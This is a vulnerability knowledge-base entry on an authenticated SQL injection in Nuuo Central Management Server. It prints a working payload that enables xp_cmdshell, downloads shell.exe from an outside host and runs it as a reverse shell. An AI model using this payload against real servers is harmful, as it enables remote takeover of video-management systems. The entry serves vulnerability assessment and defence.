Nuuo Central Management Server Authenticated SQL Server SQLi

2018-11-2700:00:00

attackerkb.com

EPSS

0.109

Percentile

95.2%

JSON

Nuuo Central Management Server v3.3 and prior are vulnerable to an authenticated SQL injection vulnerability.

Recent assessments:

jrobles-r7 at May 09, 2019 5:57pm UTC reported:

Details

Details from module documentation in Metasploit.

The GETOPENALARM verb is used to obtain information about alarms stored in the CMS Server database. An example request is below:

GETOPENALARM NUCM/1.0
DeviceID: &lt;number&gt;
SourceServer: &lt;server-id&gt;
LastOne: &lt;number&gt;

The vulnerability is in the “SourceServer” parameter, which allows injection of arbitrary SQL characters, and can be abused to inject SQL into the executing statement. For example the following request:

GETOPENALARM NUCM/1.0
DeviceID: 1
SourceServer: ';drop table bobby;--
LastOne: 3

Will cause the following SQL query to be executed on the server:
SELECT AlarmNo, EventType, DeviceID, Channel, EventDesc, DateTime, PreviewImage, SourceServer, AlarmID, State, Priority, Owner, HistoryNo, PosTransaction, AlarmNote, AlarmType FROM AlarmLog WHERE DeviceID=1 AND SourceServer=“;drop table bobby;— ‘ AND State<20 order by DateTime DESC

Given that SQL Server 2005 Express is used by default (see vulnerability #2), this can be abused to enable xp_cmdshell and achieve remote code execution.

As as example, here is a full working exploit that downloads a reverse shell from <http://10.0.99.102/shell.exe> and executes it:

';exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; declare @q varchar(8000); select @q=0x78705f636d647368656c6c2027636420433a5c77696e646f77735c74656d705c202626206563686f202473746f726167654469723d24707764203e20776765742e707331202626206563686f2024776562636c69656e74203d204e65772d4f626a6563742053797374656d2e4e65742e576562436c69656e74203e3e20776765742e707331202626206563686f202475726c203d2022687474703a2f2f31302e302e39392e3130322f7368656c6c2e65786522203e3e20776765742e707331202626206563686f202466696c65203d20227368656c6c2e65786522203e3e20776765742e707331202626206563686f2024776562636c69656e742e446f776e6c6f616446696c65282475726c2c2466696c6529203e3e20776765742e70733120262620706f7765727368656c6c2e657865202d457865637574696f6e506f6c69637920427970617373202d4e6f4c6f676f202d4e6f6e496e746572616374697665202d4e6f50726f66696c65202d46696c6520776765742e70733120262620636d64202f6320433a5c77696e646f77735c74656d705c7368656c6c2e65786527; exec (@q);--

The encoded part of the exploit is the following:

xp_cmdshell 'cd C:\windows\temp\ && echo $storageDir=$pwd &gt; wget.ps1 && echo $webclient = New-Object System.Net.WebClient &gt;&gt; wget.ps1 && echo $url = "http://10.0.99.102/shell.exe" &gt;&gt; wget.ps1 && echo $file = "shell.exe" &gt;&gt; wget.ps1 && echo $webclient.DownloadFile($url,$file) &gt;&gt; wget.ps1 && powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 && cmd /c C:\windows\temp\shell.exe'

Assessed Attacker Value: 3
Assessed Attacker Value: 3Assessed Attacker Value: 2